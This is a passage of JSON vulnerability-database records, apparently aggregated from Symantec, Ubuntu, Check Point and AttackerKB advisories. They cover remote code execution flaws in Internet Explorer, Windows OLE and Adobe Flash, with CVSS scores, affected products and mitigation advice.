"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:37", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability due to a use-after-free condition. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Internet Explorer 6, 7, 8 ,9, and 10 are vulnerable.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-2551 Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-03-11T00:00:00", "id": "SMNTC-58570", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58570", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:07", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code and gain elevated privileges in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0.0 Standard \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.1.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Client Registration Server 6.2 \n * Avaya Meeting Exchange - Recording Server 5.0.1 \n * Avaya Meeting Exchange - Recording Server 5.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.2 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.2 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Meeting Exchange - Webportal 6.2 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Application Server 6.2 \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2014-11-11T00:00:00", "type": "symantec", "title": "Microsoft Windows CVE-2014-6332 OLE Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-11T00:00:00", "id": "SMNTC-70952", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70952", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:19", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Internet Explorer 9, 10, and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n * Microsoft JScript 5.8 \n * Microsoft VBScript 5.7 \n * Microsoft VBScript 5.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2016-0189 Scripting Engine Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-0189"], "modified": "2016-05-10T00:00:00", "id": "SMNTC-90012", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/90012", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks may cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya CallPilot 5.1.0 \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2015-2419 JScript9 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-2419"], "modified": "2015-07-14T00:00:00", "id": "SMNTC-75661", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75661", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:48:09", "description": "Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x\nbefore 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux,\nAdobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR\nSDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code\nvia unspecified vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-12-28T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8651", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2015-12-28T00:00:00", "id": "UB:CVE-2015-8651", "href": "https://ubuntu.com/security/CVE-2015-8651", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:44:59", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a design flaw that could lead to integer overflow. A remote attacker can exploit this vulnerability by enticing a victim to open specially crafted SWF files.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-12-28T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Integer Overflow Remote Code Execution (APSB16-01: CVE-2015-8651)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2017-10-04T00:00:00", "id": "CPAI-2015-1429", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T03:13:50", "description": "Javascript may contain variables assigned with overly long strings. This behavior may indicate an exploitation attempt.", "cvss3": {}, "published": "2013-12-31T00:00:00", "type": "checkpoint_advisories", "title": "Suspicious Javascript Containing Overly Long Strings (CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2014-02-05T00:00:00", "id": "CPAI-2014-0372", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T03:12:38", "description": "A buffer overflow vulnerability has been reported in Internet Explorer while accessing a dynamic array of attributes of a VML shape object. The vulnerability is due to insufficient correctness check of a VML shape object attribute and may lead to memory corruption in such a way that will allow code execution in the context of the current user. A remote attacker could trigger this flaw by convincing a victim to open a malicious HTML file.", "cvss3": {}, "published": "2013-05-14T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer VML Objects Use After Free (MS13-037; CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2017-01-11T00:00:00", "id": "CPAI-2013-1695", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T03:14:18", "description": "Javascript may contain overly large amount of abnormal variable names. This behavior may indicate an exploitation attempt.", "cvss3": {}, "published": "2013-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Suspicious Javascript Variable Names (CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2014-06-30T00:00:00", "id": "CPAI-2014-0371", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T07:02:53", "description": "HTML files may include a text tag containing an overly long and suspicious strings. This behavior may indicate an exploitation attempt.", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "checkpoint_advisories", "title": "Suspicious HTML Containing Overly Long Text (CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2014-02-26T00:00:00", "id": "CPAI-2014-0948", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T15:30:30", "description": "A new obfuscation technique of remote code execution vulnerability has been reported in Microsoft Windows Object Linking and Embedding (OLE). The vulnerability is due to an improper access to memory objects by Internet Explorer. A remote attacker can exploit this issue by enticing target users to view a specially crafted web-page.", "cvss3": {}, "published": "2019-02-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows OLE Obfuscated Automation Array Remote Code Execution (CVE-2014-6332)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2019-02-27T00:00:00", "id": "CPAI-2019-0214", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:54:01", "description": "A remote code execution vulnerability has been reported in Microsoft Windows Object Linking and Embedding (OLE). The vulnerability is due to an improper access to memory objects by Internet Explorer. A remote attacker can exploit this issue by enticing target users to view a specially crafted web-page.", "cvss3": {}, "published": "2014-11-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows OLE Automation Array Remote Code Execution (MS14-064; CVE-2014-6332)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2019-03-07T00:00:00", "id": "CPAI-2014-1940", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:18", "description": "A use after free vulnerability exists in Microsoft Internet Explorer. The root cause is a heap corruption when dealing with a corrupted VBScript array size. A successful exploitation of this issue could allow an attacker to execute arbitrary code on the remote system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (MS16-051: CVE-2016-0189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189"], "modified": "2019-06-05T00:00:00", "id": "CPAI-2016-0309", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:44:29", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Jscript9 Memory Corruption (MS15-065: CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2021-09-01T00:00:00", "id": "CPAI-2015-0843", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T07:39:40", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2015-1058", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-19T10:57:56", "description": "Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x before 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux, Adobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR SDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code via unspecified vectors.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2015-12-28T00:00:00", "type": "attackerkb", "title": "CVE-2015-8651", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2021-07-27T00:00:00", "id": "AKB:1A8767F3-3BC8-4407-A9FD-DC2CFB0C9C54", "href": "https://attackerkb.com/topics/JLs1HvRokE/cve-2015-8651", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T23:37:58", "description": "OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka \u201cWindows OLE Automation Array Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2014-11-11T00:00:00", "type": "attackerkb", "title": "CVE-2014-6332", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2020-07-30T00:00:00", "id": "AKB:6CBD1561-C951-43AA-B986-08CDDABA48A6", "href": "https://attackerkb.com/topics/Od7MF9dsaM/cve-2014-6332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T02:33:17", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cJScript9 Memory Corruption Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2015-2419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-06-05T00:00:00", "id": "AKB:EE437A8A-C572-480C-AAFD-F336171F4417", "href": "https://attackerkb.com/topics/P1XXD2L59b/cve-2015-2419", "cvss": {"score": 9.3, "vector": 